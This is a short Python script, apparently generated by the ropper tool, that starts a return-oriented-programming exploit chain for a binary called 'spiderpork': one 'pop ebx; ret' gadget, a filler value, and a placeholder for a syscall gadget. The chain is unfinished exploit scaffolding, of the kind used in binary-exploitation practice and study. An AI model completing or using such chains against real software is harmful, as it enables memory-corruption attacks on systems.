#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : pack('I', x)

IMAGE_BASE_0 = 0x08048000 # spiderpork
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

# Filled registers: ebx, 
rop += rebase_0(0x00000421) # 0x08048421: pop ebx; ret; 
rop += p(0x41414141)
# INSERT SYSCALL GADGET HERE
print rop

